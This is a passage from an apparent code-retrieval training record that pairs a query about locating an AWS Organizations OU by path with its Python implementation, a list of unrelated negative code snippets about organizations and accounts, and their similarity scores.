closeTag ( \"PostalAddress\" )\n xml += closeTag ( \"ContactInfo\" )\n xml += openTag (\"ExternalResources\")\n for j in oER:\n xml += openCloseTag ( j[1], j[2])\n xml += closeTag (\"ExternalResources\")\n xml += openTag (\"RelatedCrises\")\n 
for j in oTC:\n xml += closeTagAtt (\"RelatedCrisis\", \"crisisIdent\", j[1])\n xml += closeTag (\"RelatedCrises\")\n xml += openTag (\"RelatedPersons\")\n for j in pTO:\n xml += closeTagAtt (\"RelatedPerson\", \"personIdent\", j[0])\n xml += closeTag (\"RelatedPersons\")\n xml += closeTag (\"Organization\")\n assert str ( type ( xml ) ) == \"<type 'str'>\"\n return xml", "def _orgsWithLogoForQuery(query, batch_size=5):\n orgs = []\n for org in query:\n if org.logo_url:\n orgs.append(org)\n if len(orgs) == batch_size:\n break\n\n return orgs", "def get_accounts(self, session: \"Session\") -> List[Account]:\n\n self.__get_dn(session)\n\n result = session.soapclient.get_accounts_by_owner(self.dn)\n return [Account(session, account=r) for r in result]", "def organizations(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"organizations\")", "def get_university(doc = None, cursor = None):\n\tif cursor is None and doc is not None:\n\t\treturn doc['details']['university']\n\telif doc is None and cursor is not None:\n\t\tallunivs = list()\n\t\tfor thisdoc in cursor:\n\t\t\tallunivs.append(thisdoc['details']['university'])\n\t\treturn allunivs\n\telse:\n\t\tprint \"Supply any one argument only!\"", "def get_albums():\n return query_multiple(request.args, album_search, \\\n album_filter, Album, albums_schema)", "def test_get_namespaces_from_account(self):\n pass", "def get_own_spaces(user):\n if not user:\n return []\n own_spaces = []\n accessible_spacs = get_accessible_spaces(user)\n for space in accessible_spacs:\n group_ids = [space.get_team().id, space.get_members().id, space.get_admins().id]\n if user.groups.filter(id__in = group_ids):\n own_spaces.append(space)\n return own_spaces", "def allCountriesSomeTowns(include, quiet=True):\n assert isinstance(\n include, list\n ), \"Expected `include` as type `list`\" \"but got type `{}`.\".format(\n type(include).__name__\n )\n # Get all countries.\n woeidList = [c.woeid for c in db.Country.select()]\n\n # Lookup towns belonging to a set of countries.\n filteredCountries = db.Country.select(builder.IN(db.Country.q.name, include))\n for x in filteredCountries:\n townWoeids = [y.woeid for y in x.hasTowns]\n woeidList.extend(townWoeids)\n if not quiet:\n print(x.name)\n townNames = [y.name for y in x.hasTowns]\n print(townNames)\n print()", "def ListOrganizations(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')" ]
[ "0.6812674", "0.67796934", "0.61813617", "0.5930881", "0.58512056", "0.54681545", "0.54233587", "0.53596294", "0.52998245", "0.52364296", "0.51616734", "0.51128006", "0.50904953", "0.50900835", "0.5064042", "0.50519156", "0.50236064", "0.5009377", "0.4984651", "0.49781162", "0.490988", "0.48999056", "0.48667663", "0.4866166", "0.48606572", "0.48567817", "0.48500574", "0.48356378", "0.4827705", "0.47997653", "0.47991583", "0.47858837", "0.47819954", "0.47588882", "0.47240767", "0.47204745", "0.47130844", "0.4705507", "0.46970102", "0.46938866", "0.46725634", "0.46710804", "0.46707243", "0.46588907", "0.46540985", "0.4639043", "0.4635447", "0.46278447", "0.46232757", "0.46171996", "0.46114284", "0.46109492", "0.46089798", "0.4601541", "0.4597197", "0.45941666", "0.45939168", "0.4587934", "0.4580589", "0.45740715", "0.45690075", "0.45666808", "0.45555755", "0.45554352", "0.4553994", "0.45426506", "0.4540194", "0.45347482", "0.45260847", "0.45115322", "0.4509025", "0.4503915", "0.4500836", "0.4495855", "0.44942766", "0.44866422", "0.4484719", "0.4476957", "0.44765636", "0.44752562", "0.44714344", "0.44709224", "0.4468088", "0.44615915", "0.44554722", "0.4454393", "0.44451547", "0.4436211", "0.4435343", "0.44346058", "0.4433623", "0.44282636", "0.44271073", "0.44263002", "0.44250593", "0.44131425", "0.43966916", "0.4396017", "0.43854034", "0.43841296" ]
0.6912658
0
given a path, traverse Organizations OUs to locate the required OU...
def get_ou_from_path(logger, org_client, path): logger.debug("Getting OU from path: %s", path) current_ou = org_client.list_roots()["Roots"][0]["Id"] if path == "/": return {"Id":current_ou, "Path":path} for dir_name in path.split("/")[1:]: logger.debug("Getting OU from path: %s, looking for: %s", path, dir_name) found = False args = dict(ParentId=current_ou) children = utils.generic_paginator(logger, org_client.list_organizational_units_for_parent, "OrganizationalUnits", **args) for org_unit in children: if org_unit["Name"] == dir_name: current_ou = org_unit["Id"] found = True break if not found: raise ValueError("OU path not found") return {"Id":current_ou, "Path":path}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_accounts_for_ou(logger, options, org_client, path):\n logger.debug(\"Getting accounts for OU: %s\", path)\n org_unit = get_ou_from_path(logger, org_client, path)\n ous = []\n if options.no_recursive:\n ous.append(org_unit)\n else:\n ous.extend(get_child_ous(logger, org_client, org_unit))\n\n result = []\n for org_unit in ous:\n args = {\"ParentId\":org_unit[\"Id\"]}\n accounts = utils.generic_paginator(logger, org_client.list_accounts_for_parent,\n \"Accounts\", **args)\n for acc in accounts:\n acc[\"Path\"] = org_unit[\"Path\"]\n if 'Status' in acc:\n if acc['Status'] != 'SUSPENDED':\n result.append(acc)\n else:\n logger.info(\"found suspended account %s, ignoring it.\" % acc)\n return result", "def get_child_ous(logger, org_client, org_unit):\n logger.debug(\"Getting OUs for: %s\", org_unit)\n result = [org_unit]\n\n # for this OU, get all the children...\n args = dict(ParentId=org_unit[\"Id\"])\n children = utils.generic_paginator(logger, org_client.list_organizational_units_for_parent,\n \"OrganizationalUnits\", **args)\n\n # update child paths and then call ourselves recursively to find all children\n for child in children:\n child[\"Path\"] = \"{}/{}\".format(org_unit[\"Path\"], child[\"Name\"]).replace(\"//\", \"/\")\n result.extend(get_child_ous(logger, org_client, child))\n\n return result", "def test_retrieve_l_organizations(self):\n pass", "def users_organizations(user):\n if not user or not user.is_authenticated():\n return None\n else:\n return get_users_organizations(user)", "def parse_common_organization_path(path: str) -> Dict[str, str]:\n m = re.match(r\"^organizations/(?P<organization>.+?)$\", path)\n return m.groupdict() if m else {}", "def parse_common_organization_path(path: str) -> Dict[str, str]:\n m = re.match(r\"^organizations/(?P<organization>.+?)$\", path)\n return m.groupdict() if m else {}", "def organizations(self):\n self.elements('organizations')", "def organizations(self):\n return self.get('{}/orgs'.format(ApiVersion.A1.value))", "def test_retrieve_l_organization(self):\n pass", "def save_organizations(self, user, path=None):\n # Redis has an end_cursor if we've collected this data before\n end_cursor = self.redis.get(''.join(['gh:', user.login, ':organizations:endCursor']))\n if end_cursor:\n end_cursor = end_cursor.decode('utf-8')\n end_cursor = ''.join(['\"', end_cursor, '\"'])\n organizations = u.organizations(first=100, after=end_cursor)\n else:\n organizations = u.organizations(first=100)\n if not organizations:\n return False\n while True:\n if organizations['data']['user']['organizations']['edges']:\n index = ''.join(['gh_organizations-', self.timestamp])\n self._write_to_datastore(index=index,\n doc_type='GithubOrganizations',\n document=organizations,\n login=user.login,\n path=path)\n has_next_page = organizations['data']['user']['organizations']['pageInfo']['hasNextPage']\n end_cursor = organizations['data']['user']['organizations']['pageInfo']['endCursor']\n if has_next_page:\n organizations = u.organizations(first=100, after=end_cursor)\n else:\n # Cache the end_cursor where we last collected data\n self.redis.set(''.join(['gh:', u.login, ':organizations:endCursor']), end_cursor)\n break\n else:\n break\n\n return True", "def list_ou(self, _):\n cn_re = re_compile(\"{[^}]+}\")\n results = self.engine.query(self.engine.GPO_INFO_FILTER(), [\"cn\", \"displayName\"])\n gpos = {}\n for gpo in results:\n gpos[gpo[\"cn\"]] = gpo[\"displayName\"]\n\n results = self.engine.query(self.engine.OU_FILTER())\n for result in results:\n 
print(result[\"distinguishedName\"])\n if \"gPLink\" in result:\n guids = cn_re.findall(result[\"gPLink\"])\n if len(guids) > 0:\n print(\"[gPLink]\")\n print(\"* {}\".format(\"\\n* \".join([gpos[g] if g in gpos else g for g in guids])))", "def test_organizations_read(self):\n pass", "async def get_organizations(request: Request):\n redis = request.app.state.redis\n organizations_obj = orjson.loads(await redis.get_key(\"influxdb_organizations\"))\n return [org for org in organizations_obj]", "def test_getorgs(self):\n pass", "def traverse(name, furtherPath):", "def resolve_path(self, path):\n if path:\n if path[0] == '/':\n #zope objects case\n try: return self.unrestrictedTraverse(path)\n except: pass\n else:\n #aliss (python) objects case\n try: return self.get_aliss_object(path)\n except: pass\n #case of no path\n pass", "def computeMailboxOu(portal, title):\n\n catalog = portal.portal_catalog\n\n current = cleaned = toAscii(title).lower()\n i = 1\n existing = True\n while existing:\n existing = catalog(ou=current)\n if not existing:\n break\n current = '%s_%d' % (cleaned, i)\n i += 1\n dtool = getToolByName(portal, 'portal_directories', None)\n if dtool is not None: # not in unit tests\n ldir = getattr(dtool, 'local_addressbook_ldap', None)\n if ldir is not None:\n createOuInLDAP(ldir, current)\n return current", "def test_getorganizations_item(self):\n pass", "def calc_path_2_ORCIDs(path=curr,node1=None,node2=None):\n\n with open(path + '/' + 'ORCID_graph.pkl', 'rb') as f:\n G = pickle.load(f)\n\n if (node1 is None) or (node2 is None):\n with open(path + '/' + 'centrality.csv', 'rb') as f:\n centrality = csv.reader(f, delimiter='\\t')\n rn = 0\n for row in centrality:\n if rn == 0:\n tmp1 = row\n rn += 1\n elif rn == 1:\n tmp2 = row\n rn += 1\n else:\n break\n if node1 is None:\n node1 = tmp1[0]\n if node2 is None:\n node2 = tmp2[0]\n\n try:\n short_path = nx.algorithms.shortest_paths.generic.shortest_path(G, source=node1,target=node2)\n except:\n return []\n\n return short_path", "def test_retrieve_l_organization_locations(self):\n pass", "def atlas_organizations():\n pass", "def sub_test_verify_organizations_paths(self):\n self.TR.has_active_organizations() # resets the active orgs\n original_active_count = len(self.TR.active_organizations)\n last_org = self.TR.active_organizations[0]\n last_org_upload_paths = last_org.org_machine_upload_paths()\n random_index = random.randrange(0, len(last_org_upload_paths))\n remove_file_or_dir(last_org_upload_paths[random_index])\n self.TR.verify_organizations_paths()\n self.assertNotEqual(original_active_count, len(self.TR.active_organizations))", "def test_organizations_list(self):\n pass", "def traverse(self, path):\n\n path_list = [s for s in path.split('/') if len(s) > 0 ]\n # print(path)\n # print('files:', self.files)\n directory = self.files\n index = 0\n while index < len(path_list) and path_list[index] in directory:\n if type(directory[path_list[index]]) is str: # directory is a file\n break\n directory = directory[path_list[index]]\n index += 1\n print('info', directory, path_list[index:])\n return directory, path_list[index:]", "def get_iso_path(src_iso_path, iso, dvd_path_list):\n for path in dvd_path_list: \n for root, _, all_files in os.walk(path.strip()):\n for onefile in all_files: \n if iso.upper() == onefile.upper(): \n src_iso_path = os.path.join(root, onefile) \n initlog(\"find iso: %s\" % src_iso_path)\n break\n return src_iso_path", "def test_get_organization(self):\n pass", "def _get_ou_ids(self, org):\n\n # get root id\n 
root_id = self._get_root_id(org)\n\n # get OUs under the Org root\n ou_list_at_root_level = self._list_ou_for_parent(org, root_id)\n\n _ou_name_to_id_map = {}\n _all_ou_ids = []\n\n for ou_at_root_level in ou_list_at_root_level:\n # build list of all the OU IDs under Org root\n _all_ou_ids.append(ou_at_root_level.get('Id'))\n # build a list of ou id\n _ou_name_to_id_map.update(\n {ou_at_root_level.get('Name'): ou_at_root_level.get('Id')}\n )\n\n self.logger.info(\"Print OU Name to OU ID Map\")\n self.logger.info(_ou_name_to_id_map)\n\n return _all_ou_ids, _ou_name_to_id_map", "def _get_path_objs(self, path_list):\n objs = []\n for path in path_list:\n obj = self.unrestrictedTraverse(path, None)\n if obj and getattr(obj, 'isPrincipiaFolderish', 0):\n objs.append(obj)\n \n return objs", "def createOuInLDAP(ldir, ou):\n\n dn = 'ou=%s,%s' % (ou, ldir.ldap_base_creation)\n attrs = {'objectClass': ['top', 'organizationalUnit'],\n 'ou': ou}\n ldir.insertLDAP(dn, attrs)", "def extract_organization(self, root):\n organization = {}\n info = root.xpath('.//li/h4/a')\n if info:\n link = info[0].get('href', None)\n name = info[0].get('title', None)\n if link and name:\n stmt = select([\n func.count(self.organization_table.c.path)\n ]).where(\n self.organization_table.c.path == link\n )\n results = self.connection.execute(stmt).fetchall()\n if results[0][0] > 0:\n self.logger.debug('{} already exists'.format(name))\n return None\n self.logger.debug('Querying {1}: {0}'.format(link, name))\n response = self.session.get(self.PODEROPEDIA_BASE_URL + link)\n content = response.content\n html_tree = etree.HTML(content, parser=self.parser)\n connections = html_tree.xpath('//div[@id=\"conexiones\"]')\n if connections:\n organization_data = self.extract_element_data(connections[0])\n organization['organization_data'] = organization_data if organization_data else {}\n organization['organization_data']['path'] = link\n\n person = self.extract_persons(connections[0])\n organization['member'] = person if person else []\n for item in organization['member']:\n item.update({'source_path': link})\n\n related_organization = self.extract_participation(connections[0])\n organization['organization'] = related_organization if related_organization else []\n for item in organization['organization']:\n item.update({'source_path': link})\n return organization", "def traverse(tree, path):\n for node in path:\n tree = tree[node]\n return tree", "def list_all_organizations(ctx):\n pprint(ctx.obj.orgs.get().data)", "def organizations(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"organizations\")", "def onto2path(ontology_name_or_path: str) -> str:\n prefix = \"./resources/ontologies/\"\n predefined_map = {\n \"swo\": f\"{prefix}/swo_merged.owl\",\n \"awo\": f\"{prefix}/AfricanWildlifeOntology1.owl\",\n \"ontodt\": f\"{prefix}/OntoDT.owl\",\n \"stuff\": f\"{prefix}/stuff.owl\",\n \"demcare\": f\"{prefix}/exchangemodel.owl\",\n \"trh\": f\"{prefix}/trh.owl\",\n \"pizza\": f\"{prefix}/pizza.owl\"\n }\n if ontology_name_or_path in predefined_map:\n return predefined_map[ontology_name_or_path]\n else:\n return ontology_name_or_path", "def exportOrgs ( c ) :\n assert str(type(c)) == \"<type '_mysql.connection'>\"\n xml = \"\"\n o = sqlQuery ( c, \"select * from Organizations;\" )\n for i in o:\n oL = sqlQuery ( c, \"select * from OrganizationLocations where orgID = '\"+i[0]+\"';\" )\n oER = sqlQuery ( c, \"select * from OrganizationExternalResources where orgID = '\"+i[0]+\"';\" )\n oTC = sqlQuery ( c, 
\"select * from OrganizationsToCrises where orgID = '\"+i[0]+\"';\" )\n pTO = sqlQuery ( c, \"select * from PeopleToOrganizations where orgID = '\"+i[0]+\"';\" )\n xml += openTagAtt ( \"Organization\", \"organizationIdent\", i[0])\n xml += openCloseTag ( \"Name\", i[1])\n xml += closeTagAtt ( \"Kind\", \"organizationKindIdent\", i[2])\n for j in oL :\n xml += openTag ( \"Location\" )\n xml += openCloseTag ( \"Locality\", j [ 1 ] )\n xml += openCloseTag ( \"Region\", j [ 2 ] )\n xml += openCloseTag ( \"Country\", j [ 3 ] )\n xml += closeTag ( \"Location\" )\n xml += openCloseTag (\"History\", i[3])\n xml += openTag ( \"ContactInfo\" )\n xml += openCloseTag (\"Telephone\", i[4])\n xml += openCloseTag (\"Fax\", i[5])\n xml += openCloseTag (\"Email\", i[6])\n xml += openTag (\"PostalAddress\")\n xml += openCloseTag (\"StreetAddress\", i[7])\n xml += openCloseTag ( \"Locality\", i[8])\n xml += openCloseTag ( \"Region\", i[9])\n xml += openCloseTag ( \"PostalCode\", i[10])\n xml += openCloseTag ( \"Country\", i[11])\n xml += closeTag ( \"PostalAddress\" )\n xml += closeTag ( \"ContactInfo\" )\n xml += openTag (\"ExternalResources\")\n for j in oER:\n xml += openCloseTag ( j[1], j[2])\n xml += closeTag (\"ExternalResources\")\n xml += openTag (\"RelatedCrises\")\n for j in oTC:\n xml += closeTagAtt (\"RelatedCrisis\", \"crisisIdent\", j[1])\n xml += closeTag (\"RelatedCrises\")\n xml += openTag (\"RelatedPersons\")\n for j in pTO:\n xml += closeTagAtt (\"RelatedPerson\", \"personIdent\", j[0])\n xml += closeTag (\"RelatedPersons\")\n xml += closeTag (\"Organization\")\n assert str ( type ( xml ) ) == \"<type 'str'>\"\n return xml", "def vpath(self, ospath):\n for root, path in self._top_paths.items():\n if ospath.startswith(path + '/'):\n return '/%s%s' % (root, ospath[len(path):])", "def organizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"organizations\")", "def organizations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"organizations\")", "def listOrganizations(self, name='', type=''):\n return self.get_json('/organization', {'name': name, 'type': type})", "def traverse(self, path):\n path_list = [s for s in path.split('/') if len(s) > 0 ]\n directory = self.files\n index = 0\n while index < len(path_list) and path_list[index] in directory:\n if type(directory[path_list[index]]) is str: # directory is a file\n break\n directory = directory[path_list[index]]\n index += 1\n return directory, path_list[index:]", "def _createOrganizationsCollections(folder):\n collections = [\n {'id': 'all_orgs', 'tit': _('all_orgs'), 'subj': (u'search', ), 'query': [\n {'i': 'portal_type',\n 'o': 'plone.app.querystring.operation.selection.is',\n 'v': ['organization']}],\n 'cond': u\"\", 'bypass': [],\n 'flds': (u'select_row', u'org_pretty_link_with_additional_infos',\n u'SelectedInPlonegroupColumn', u'PloneGroupUsersGroupsColumn',\n u'review_state', u'CreationDate', u'actions'),\n 'sort': u'sortable_title', 'rev': False, 'count': False},\n ]\n _createDashboardCollections(folder, collections)", "def _resolve_path(d, path):\n accum_value = d\n for node_key in path:\n accum_value = accum_value[node_key]\n return accum_value", "def common_organization_path(organization: str,) -> str:\n return \"organizations/{organization}\".format(organization=organization,)", "def organizations_at_location(self, location):\n if location is None:\n queryset = self.filter(location=None)\n elif location.region is None:\n queryset = 
self.filter(Q(location=None) | Q(location=location))\n elif location.tik is None:\n queryset = self.filter(Q(location=None) | Q(location__id__in=[location.region_id, location.id]))\n else:\n queryset = self.filter(Q(location=None) | Q(location__id__in=[location.tik_id, location.region_id, location.id]))\n\n organization_ids = set(queryset.values_list('organization_id', flat=True))\n\n organizations = Organization.objects.filter(id__in=organization_ids).order_by('title')\n\n for representative in OrganizationRepresentative.objects.filter(organization__in=organization_ids):\n organization = (filter(lambda org: org.id==representative.organization_id, organizations) or [None])[0]\n if organization:\n organization.representative = True\n\n return organizations", "def myorgs(request):\n context = RequestContext(request)\n \n user = request.user\n orgs = user.orgusers.get_query_set()\n \n context['orgs'] = orgs\n return render_to_response('myorgs.html', context)", "def education(osm_path): \n return (retrieve(osm_path,'multipolygons',['amenity'],**{'amenity':[\"='college' or \",\"='kindergarten' or \",\"='library' or \",\"='school' or \",\"='university'\"]})).rename(columns={'amenity': 'asset'})", "def acyclic_sub_path(tree, path):\n for u, v in pairwise(reversed(path)):\n if v in tree.nodes and u not in tree.nodes:\n return path[path.index(v):]", "def get_orgs():\n \n url = \"https://api.github.com/user/orgs\"\n \n org_urls = []\n orgs = utils.get_json(url)\n \n for org in orgs:\n org_urls.append(org[\"url\"])\n \n return org_urls", "def get_organizations(self, language=None):\n return self.get_direct_related_page_extensions(\n Organization, OrganizationPluginModel, language=language\n )", "def obtener_por_uo(unidad_organica_id):\n db = current.db\n q = (db.departamento.id > 0)\n q &= (db.departamento.unidad_organica_id == unidad_organica_id)\n return db(q).select(db.departamento.ALL,\n orderby=db.departamento.nombre)", "def process_organizations(self, organizations):\n self.process_elements(\n organizations,\n self.organization_table,\n self.extract_organization,\n ['organization_data', 'member', 'organization']\n )", "def oedir(self):\n # if we've never read, (check out), the working dir, or if the\n # last time we did doesn't match what's available in the\n # repository...\n upstreamrev = self.svnrev(self.options.svnloc)\n if (not hasattr(self, '_last_read_oedir')\n or (self._last_read_oedir != upstreamrev)):\n\n self._oedir = self.options.oedir\n self.logger.debug('(Re)reading oedir: {}'.format(upstreamrev))\n\n if os.path.isdir(self._oedir):\n self.logger.debug('+ svn cleanup {}'.format(self._oedir))\n self.svn().connection.cleanup(self._oedir)\n\n self.logger.debug('+ svn co {} {}'.format(self.options.svnloc, self._oedir))\n self.svn().co(self.options.svnloc, self._oedir)\n downstreamrev = self.svnrev(self._oedir)\n self.logger.debug('Read oedir: {}'.format(downstreamrev))\n self._last_read_oedir = downstreamrev\n\n return self._oedir", "def get_organizations(\n self, *, params: Optional[dict] = None\n ) -> \"resource_types.Organizations\":\n\n return communicator.Organizations(self.__requester).fetch(parameters=params)", "def generate_test_organizations(self):\n def generate_organizations_for_parent(org_names, parent_name=None):\n item_dict = {}\n for name in org_names:\n if parent_name:\n item_dict['{}_{}'.format(name, parent_name)] = {\n 'name': name,\n 'parent': parent_name\n }\n else:\n item_dict['{}'.format(name)] = {\n 'name': name\n }\n return item_dict\n\n self.os_dict = \\\n 
generate_organizations_for_parent(\n ['o1', 'o1', 'o2', 'o3', 'o4_del', 'o5_del'])\n\n # generate organizations in database\n self.orgs = self.create_orgs_from_data(self.os_dict)\n\n # generate sub organizations\n self.subs_o1_dict = \\\n generate_organizations_for_parent(\n ['sub1', 'sub2', 'sub3_del', 'sub4_del', 'sub5_del'], 'o1')\n\n self.subs_o2_dict = \\\n generate_organizations_for_parent(\n ['sub1', 'sub2', 'sub3', 'sub4_del', 'sub5_del'], 'o2')\n\n self.subs_o3_dict = \\\n generate_organizations_for_parent(\n ['sub1', 'sub2', 'sub3_del'], 'o3')\n\n # generate sub organizations dictionary\n self.subs_dict = {\n **self.subs_o1_dict,\n **self.subs_o2_dict,\n **self.subs_o3_dict,\n }\n\n # update organizations list with sub_organizations in database\n self.orgs.update(\n self.create_orgs_from_data(self.subs_dict, self.orgs))", "def traverse_file(path: str) -> List[LogItem]:\n org_file = OrgDataStructure()\n org_file.load_from_file(path)\n return traverse_node(org_file.root, [], path)", "def get_organization_links_by_page(self):\n return self.get_resource_by_page(\"/orgs\")", "def common_organization_path(\n organization: str,\n ) -> str:\n return \"organizations/{organization}\".format(\n organization=organization,\n )", "def canonicalPath(path_or_object):", "def search_dir(cautare, adresa):\n if os.path.isdir(adresa):\n for director in os.listdir(adresa):\n path = os.path.join(adresa, director)\n if os.path.isfile(path) and (cautare in director):\n print(\"Fisierul care contine litera %s se gaseste \"\n \"la adresa %s\" % (cautare, path))\n else:\n search_dir(cautare, path)", "def GcsPath(*path_components):\n return os.path.join(*path_components)", "def get_domain_otu(self):\n for leaf in self.feature_tree.get_terminals():\n leaf.domain_otu = leaf.name\n self.feature_tree = self.get_node_domain_otu(self.feature_tree)\n #print(temp)\n\n \"\"\"\n for clade in self.feature_tree.find_clades(order='level'):\n if not clade.clades:\n continue\n if clade.clades[0].abu < clade.clades[1].abu:\n clade.domain_otu = clade.clades[1].name\n else:\n clade.domain_otu = clade.clades[0].name\n print('self feature tree root abu')\n print(self.feature_tree.domain_otu)\n \"\"\"", "def ospath(self, vPath):\n if not vPath.startswith('/'):\n raise OSError(vPath)\n parts = vPath.split('/')\n toppath = self._top_paths[parts[1]]\n return os.path.join(toppath, *parts[2:])", "def test_import_organization(self):\r\n tree = self.org_tree\r\n root = tree.getroot()\r\n assert importer.put_objects(root) == True", "def get_organization_links(self):\n yield from self.get_resource_by_item(\"/orgs\")", "def walk_up ( dirpath, topdown=False, max_iter=None ):\n def iter_partial_paths ( _join_path=os.sep.join ):\n fspath = os.path.normpath ( dirpath ).rstrip ( os.sep )\n path_elements = fspath.split ( os.sep )\n\n if path_elements:\n p_start = 0 if path_elements[0] else 1\n high = len ( path_elements )\n\n if topdown:\n if not path_elements[0]:\n yield os.sep\n\n for k in range ( p_start+1, high+1 ):\n yield _join_path ( path_elements[:k] )\n else:\n for k in range ( high, p_start, -1 ):\n yield _join_path ( path_elements[:k] )\n\n if not path_elements[0]:\n yield os.sep\n # --- end of iter_partial_paths (...) 
---\n\n if max_iter is None:\n for path in iter_partial_paths():\n yield path\n else:\n for n, path in enumerate ( iter_partial_paths() ):\n if n < max_iter:\n yield path\n else:\n return", "def list_orgs(self):\n orgs = list(self.orgs.keys())\n orgs.sort()\n return orgs", "def ListOrganizations(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def build_path(start, end):\n a = hierarchy.index(start)\n b = hierarchy.index(end)\n if a == b:\n return []\n elif a < b:\n return hierarchy[a + 1 : b + 1]\n return list(reversed(hierarchy[b:a]))", "async def All_orgs():\n\n links_13 = []\n links_14 = []\n valid_url = \"/?archive/?gsoc/\\d+[0-9]/orgs/[a-zA-Z]+\"\n for year in range(2009, 2016):\n year_url = melange + \"/archive/gsoc/{}\".format(year)\n soup = await get_page(year_url)\n\n for url in soup.find_all('a'):\n if re.match(valid_url, url.get(\"href\")):\n if year <= 2013:\n links_13.append(join(melange, url.get(\"href\")[1:]))\n else:\n links_14.append(join(melange, url.get(\"href\")[1:]))\n return links_13, links_14", "def TraversalScriptPath(apath,dict_info,user_ini):\n path = apath.replace('\\\\','/')\n# recordLogsToList(r'Transforming path----%s'%path)\n if not os.path.exists(path):\n recordLogsToList('%s is not exist!' % path)\n return False\n if os.path.isfile(path):\n if '.html' in path:\n parseTestcase(path,dict_info,user_ini)\n elif os.path.isdir(path):\n if '.svn' in path:\n pass\n else:\n searchfile = os.listdir(path)\n for vpath in searchfile:\n childpath = path + '/' + vpath\n TraversalScriptPath(childpath,dict_info,user_ini)\n else:\n recordLogsToList('%s is an unknown object,I can not handle it!' % path)\n\n return True", "def nav_path(request):\n\n if not request.repos:\n return []\n\n is_dir = request.pathtype == vclib.DIR\n\n # add root item\n items = []\n root_item = _item(name=request.server.escape(request.repos.name), href=None)\n if request.path_parts or request.view_func is not view_directory:\n root_item.href = request.get_url(\n view_func=view_directory, where=\"\", pathtype=vclib.DIR, params={}, escape=1\n )\n items.append(root_item)\n\n # add path part items\n path_parts = []\n for part in request.path_parts:\n path_parts.append(part)\n is_last = len(path_parts) == len(request.path_parts)\n\n item = _item(name=request.server.escape(part), href=None)\n\n if not is_last or (is_dir and request.view_func is not view_directory):\n item.href = request.get_url(\n view_func=view_directory,\n where=_path_join(path_parts),\n pathtype=vclib.DIR,\n params={},\n escape=1,\n )\n elif not is_dir and request.view_func is not view_log:\n item.href = request.get_url(\n view_func=view_log,\n where=_path_join(path_parts),\n pathtype=vclib.FILE,\n params={},\n escape=1,\n )\n items.append(item)\n\n return items", "def generate_path(self):\n ontology = []\n for item in self.parent.get_ancestors():\n if item.level != 0:\n ontology.append(item.slug)\n\n if self.parent.level != 0:\n ontology.append(self.parent.slug)\n\n ontology.append(self.slug)\n\n return '/' + '/'.join(ontology) + '/'", "def create_ou(self, dn, name, description):\n attrs = {'objectclass': ['top', 'organizationalUnit'], 'ou': name, 'description': description}\n self.add_entry(dn, attrs)", "async def browse_path(svc: Pytheos, path: str) -> TreeEntry:\n tree = await _init_tree_with_sources(svc)\n\n source_id = None\n current_node = tree\n for comp in path.split('/'):\n # Handle leading, 
trailing, or duplicate slashes\n if comp == '':\n continue\n\n # Refresh our current node and bail out if it can't be found.\n current_node = current_node.get(comp)\n if current_node is None:\n raise ValueError('Could not find path')\n\n # Retrieve the contents of our new current node\n source_id, results = await _retrieve_contents(svc, source_id, current_node.object)\n for item in results:\n current_node[item.name] = TreeEntry(obj=item)\n\n return current_node", "def getImmediateSubdirectories(dir):", "def opath ( dir_name, file_name = None ):\n if file_name:\n return os.path.join(output_path, dir_name, file_name)\n return os.path.join(output_path, dir_name)", "def orcid_lookup(self):\n if not hasattr(self, \"_orcid_lookup\"):\n self._orcid_lookup = {}\n self.load_data()\n for entry in self.data.get(\"contributor\", []):\n if \"@id\" in entry:\n # Orcid represented as full URL but we just want id\n orcid = entry[\"@id\"].split(\"/\")[-1]\n self._orcid_lookup[orcid] = entry\n return self._orcid_lookup", "def test_get_namespaces_from_account(self):\n pass", "def get_organization(self):\n return self.reference[REF_ORGANIZATION][REF_VALUE]", "def get_organization_details(self):\n\n # Returns 1) OU Name to OU ID mapping (dict)\n # key: OU Name (in the manifest); value: OU ID (at root level)\n # 2) all OU IDs under root (dict)\n org = Organizations(self.logger)\n all_ou_ids, ou_name_to_id_map = self._get_ou_ids(org)\n\n # Returns 1) active accounts (list) under an OU.\n # use case: used to validate accounts in the manifest file\n # 2) Accounts for each OU at the root level.\n # use case: map OU Name to account IDs\n # key: OU ID (str); value: Active accounts (list)\n accounts_in_all_ous, ou_id_to_account_map = \\\n self._get_accounts_in_ou(org, all_ou_ids)\n\n # Returns account name in manifest to account id mapping.\n # key: account name; value: account id\n name_to_account_map = self.get_account_for_name(org)\n\n return accounts_in_all_ous, ou_id_to_account_map, \\\n ou_name_to_id_map, name_to_account_map", "def operator_at_traversal_path(path, op):\n fmt_strs = [path[0]] + ['%s' for leaf in path[1:]]\n traversal = '->'.join(fmt_strs[:-1]) + '{op}%s'.format(op=op)\n return traversal", "def get_organization(login: str, url: str, session):\n _try = 0\n tries = 3\n exception = None\n while _try <= tries:\n try:\n organization = session.query(Organization).get(login)\n if not organization:\n organization = Organization(login, url)\n session.add(organization)\n session.commit()\n return organization\n except IntegrityError as e:\n print(f'Got an Organization IntegrityError, Try {_try} of {tries}')\n _try += 1\n exception = e\n pass\n\n raise exception", "def orfFinder(data):\n\t\n\tORFile = getORFs(data.seqFile, \n\t\t\t\t\t data.queryName, \n\t\t\t\t\t data.o)\n\tsetattr(data, \"ORFs\", ORFile)", "def ospathdirname(lp, platform=None):\n if platform is None:\n return os.path.dirname(lp)\n elif platform.startswith(\"win\"):\n return \"\\\\\".join(lp.replace(\"/\", \"\\\\\").split(\"\\\\\")[:-1])\n return \"/\".join(lp.replace(\"\\\\\", \"/\").split(\"/\")[:-1])", "def convert_paths(self):\n # convert to node sequences, dropping s'\n self.nodeseq_paths = []\n for path in self.paths:\n node_seq = [] # don't include s'\n for arc in path:\n node_seq.append(self.arc_info[arc]['destin'])\n self.nodeseq_paths.append(node_seq)\n # convert to og graph\n self.converted_paths = []\n for path in self.nodeseq_paths:\n this_path = []\n add_next_node = True\n for i in range(len(path) - 